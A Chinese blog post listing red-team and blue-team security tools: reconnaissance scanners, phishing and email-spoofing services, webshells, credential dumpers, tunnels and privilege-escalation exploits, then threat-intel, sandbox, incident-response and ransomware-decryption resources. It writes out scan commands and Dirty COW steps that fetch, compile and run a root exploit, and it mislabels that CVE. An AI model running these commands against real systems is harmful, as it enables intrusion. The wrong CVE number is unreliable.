[持续更新] 红蓝对抗安全工具

红队

信息收集

https://chrome.zzzmh.cn/info?token=gppongmhjkpfnbhagpmjfkannfbllamg  Wappalyzer(chrome网站分析插件)

https://www.whatruns.com/  Web指纹识别

https://github.com/Ekultek/WhatWaf  防火墙识别

https://github.com/r0eXpeR/redteam_vul  红队指纹

https://github.com/skskevin/PortScan

https://github.com/shadow1ng/fscan  扫描

https://sploitus.com/  漏洞搜索

https://www.exploit-db.com/ 漏洞数据库

https://www.exploit-database.net/  漏洞数据库2

 

https://github.com/lz520520/railgun  渗透工具

https://github.com/gobysec/Goby  扫描工具(梳理资产暴露攻击面)

https://github.com/projectdiscovery/  企业外网资产收集

 

https://github.com/rtcatc/Packer-Fuzzer  Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具

https://github.com/chaitin/xray  长亭Xray

https://github.com/maurosoria/dirsearch  Dirsearch(扫目录)

https://github.com/H4ckForJob/dirmap  Dirmap(扫目录)

https://github.com/Tuhinshubhra/CMSeeK  CMS识别

http://whatweb.bugscaner.com/look/  在线cms指纹识别

 

https://github.com/shmilylty/OneForAll  子域收集工具

https://github.com/lijiejie/subDomainsBrute  subdomainsbtute(子域)

 

https://github.com/BugScanTeam/GitHack  Git泄露

https://github.com/kost/dvcs-ripper  常规信息泄露

 

https://github.com/TheKingOfDuck/fuzzDicts  fuzzdb

https://github.com/1N3/IntruderPayloads  fuzzdb

https://github.com/TheKingOfDuck/easyXssPayload  XssPayload

 

MD5

https://www.cmd5.com/

https://www.somd5.com/

http://www.chamd5.org/

https://cmd5.la/

http://www.xmd5.org/index_cn.htm

 

漏洞检测攻击

https://github.com/SafeGroceryStore/MDUT  数据库利用工具

https://github.com/Macr0phag3/email_hack  钓鱼邮件

https://emkei.cz/  伪造邮件

https://github.com/brendan-rius/c-jwt-cracker  jwt伪造

https://github.com/feihong-cs/ShiroExploit  Shiro 反序列化

https://github.com/feihong-cs/ShiroExploit-Deprecated  Shiro 反序列化2

https://github.com/dionach/CMSmap  CMS漏洞检测工具

https://github.com/chenjj/CORScanner  扫描CORS配置漏洞

https://github.com/deathmarine/Luyten/releases/  Luyten反编译工具(jar包)

https://github.com/opensec-cn/vtest  VTest - 漏洞测试辅助系统

https://github.com/meizjm3i/PHPVulFinder  PHP代码静态自动化审计工具

https://github.com/sveinbjornt/Platypus   Platypus - 多会话交互式主机管理工具 

https://dig.pm/  DNSLOG

 

主机存活扫描

nbtscan.exe:nbtscan 192.168.1.1/20

arp-scan.exe:arp-scan.exe -t 192.168.1.1/24  https://github.com/QbsuranAlang/arp-scan-windows-

ping:for /L %I in (1,1, 254) do @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”

Invoke-ARPScan.ps1: powershell.exe -exec bypass -Command “& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}” >> c:\log.txt

Powershell 渗透测试工具-Nishang  https://github.com/samratashok/nishang

cping:cping scan smbvul 10.33.93.1 10.33.93.1

qs.exe:qs alive 192.168.1.1/24

dnsbrute

F-NAScan.py  https://github.com/ywolf/F-NAScan

fscan:

https://github.com/shadow1ng/fscan

https://github.com/chaosec2021/fscan-POC

 

端口扫描

s.exe: s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save

scanline: scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b

Invoke-Portscan.ps1:Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [探测存活 -ResolveHost]

nmap

 

后渗透

https://i.hacking8.com/tiquan  提权识别

https://www.shentoushi.top/av/av.php  杀软识别

 

https://github.com/k8gege/Ladon    Ladon 7.2

https://github.com/gentilkiwi/mimikatz  密码抓取

https://www.objectif-securite.ch/en/ophcrack  哈希破解

http://cracker.offensive-security.com/index.php  哈希破解

https://github.com/shack2/SNETCracker  超级弱口令检查工具

https://ngrok.com/  内网穿透1

https://github.com/fatedier/frp  内网穿透2

https://github.com/sensepost/reDuh  内网穿透3

https://github.com/SECFORCE/Tunna  内网穿透4

https://github.com/ehang-io/nps  内网穿透5

https://github.com/esrrhs/spp  内网穿透6

https://github.com/BeichenDream/Godzilla/   哥斯拉 Webshell

https://github.com/rebeyond/Behinder/  冰蝎 Webshell

https://github.com/AntSwordProject/AntSword-Loader/releases/tag/4.0.3   蚁剑

https://github.com/FireFart/dirtycow  脏牛提权(cve-2016-5159)

Linux kernel >= 2.6.22
gcc -pthread dirty.c -o dirty -lcrypt
执行./dirty 密码命令,即可进行提权。提权之前可将/etc/passwd备份一下。
View Code

https://github.com/dirtycow/dirtycow.github.io  脏牛提权1(cve-2016-5159)

https://github.com/gbonacini/CVE-2016-5195  脏牛提权2(cve-2016-5159)

wget https://github.com/gbonacini/CVE-2016-5195/archive/master.zip
unzip master
cd CVE-2016-5195-master
make
./dcow -s
View Code

https://github.com/abatchy17/WindowsExploits  提权漏洞(2017.5)

https://github.com/QAX-A-Team/BrowserGhost      浏览器信息收集

https://github.com/uknowsec/SharpDecryptPwd  主机密码收集工具(Windows)

https://github.com/SecureAuthCorp/impacket  Impacket是用于网络协议的Python类的集合

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD  disable_function.工具

http://payloads.net/Windows_patch/  Windows辅助提权工具

https://i.hacking8.com/tiquan/  Windows辅助提权工具2

http://blog.neargle.com/win-powerup-exp-index/#  Windows辅助提权工具3

linux-exploit-suggester.sh  linux提权辅助工具(一)

linux-exploit-suggester-2.pl  linux提权辅助工具(二)

privchecker.py  linux提权辅助工具(三)

LinEnum.sh  linux提权辅助工具(四)

https://github.com/Rvn0xsy/Cooolis-ms  内网管理工具包

https://bashupload.com/  文件上传共享

https://transfer.sh/#  文件上传共享

 

域渗透

https://github.com/BloodHoundAD/BloodHound  域用户

https://github.com/SkewwG/domainTools  域渗透小工具

 

 

蓝队

威胁情报

https://www.virustotal.com/  VirusTotal

https://x.threatbook.cn/  微步在线

https://ti.qianxin.com/  奇安信威胁情报

https://ti.360.cn/#/homepage  360威胁情报中心

https://www.venuseye.com.cn/  启明星辰威胁情报

https://redqueen.tj-un.com  REDQUEEN

https://poma.nsfocus.com/  绿盟的威胁分析中心

https://habo.qq.com/  腾讯哈勃系统

https://mac-cloud.riskivy.com  FreeBuf × 漏洞盒子「大圣云沙箱」

 

在线云沙箱

https://ata.360.cn/detection  360沙箱云

https://s.threatbook.cn/  微步云沙箱

https://www.virustotal.com/gui/home/upload  VirusTotal平台

https://www.maldun.com/submit/submit_file/  魔盾安全分析平台

https://app.any.run/  Any.Run交互式恶意软件分析平台

 

溯源

https://www.chaipip.com/  高精度IP地址查询-查IPIP

https://www.opengps.cn/Data/IP/ipplus.aspx  高精度IP定位

https://www.ipip.net/ip.html  ipip反查

http://ip.yqie.com/  ip地址反向查询

http://qd.yyimg.com/act/index/id/  百度ID反查

https://www.reg007.com/  注册网站反查

 

漏洞情报

https://www.secshi.com/circle/qingbao  安全师情报共享

https://www.seebug.org/  seebug

https://nosec.org/home/index/hole.html  nosec

 

空间测绘网站

https://www.zoomeye.org/  钟馗之眼  

https://fofa.so/

https://www.shodan.io/

https://quake.360.cn/quake/#/index

 

webshell查杀

http://www.d99net.net/  D盾 

https://www.shellpub.com/  河马

https://scanner.baidu.com  百度

 

 

应急响应工具

Windows

Autoruns

PCHunter

ProcessDump

processhacker

火绒剑

https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer  Process Explorer

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon  Process Monitor

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec  Psexec

https://docs.microsoft.com/zh-cn/sysinternals/downloads/tcpview  TCPView

https://docs.microsoft.com/zh-cn/sysinternals/downloads/adexplorer  Active Directory Explorer

https://goaccess.io/  Access日志分析

Linux

https://github.com/grayddq/GScan  Linux主机排查

https://github.com/T0xst/linux  Linux 安全检查

 

勒索病毒搜索网站

【360】 勒索病毒搜索引擎,支持检索超过800种常见勒索病毒

https://lesuobingdu.360.cn/

【腾讯】 勒索病毒搜索引擎,支持检索超过 300 种常见勒索病毒

https://guanjia.qq.com/pr/ls/

【启明】VenusEye勒索病毒搜索引擎,超300种勒索病毒家族

https://lesuo.venuseye.com.cn/

【奇安信】勒索病毒搜索引擎

https://lesuobingdu.qianxin.com/

【深信服】勒索病毒搜索引擎

https://edr.sangfor.com.cn/#/information/ransom_search

 

勒索软件解密工具集

【腾讯哈勃】勒索软件专杀工具

https://habo.qq.com/tool/index

【金山毒霸】勒索病毒免疫工具

http://www.duba.net/dbt/wannacry.html

【火绒】勒索病毒解密工具集合

http://bbs.huorong.cn/thread-65355-1-1.html

【瑞星】解密工具下载

http://it.rising.com.cn/fanglesuo/index.html

【nomoreransom】勒索软件解密工具集

https://www.nomoreransom.org/zh/index.html

【MalwareHunterTeam】勒索软件解密工具集

https://id-ransomware.malwarehunterteam.com/

【卡巴斯基】免费勒索解密器

https://noransom.kaspersky.com/

【Avast】免费勒索软件解密工具

https://www.avast.com/zh-cn/ransomware-decryption-tools

【Emsisoft】免费勒索软件解密工具

https://www.emsisoft.com/ransomware-decryption-tools/free-download

 

专杀工具

https://www.qianxin.com/other/qaxvirusremoval  奇安信顽固病毒专杀工具

https://bbs.huorong.cn/thread-18575-1-1.html  火绒恶性木马专杀工具

 

posted @ 2020-05-26 16:58  时光不改  阅读(2841)  评论(0编辑  收藏  举报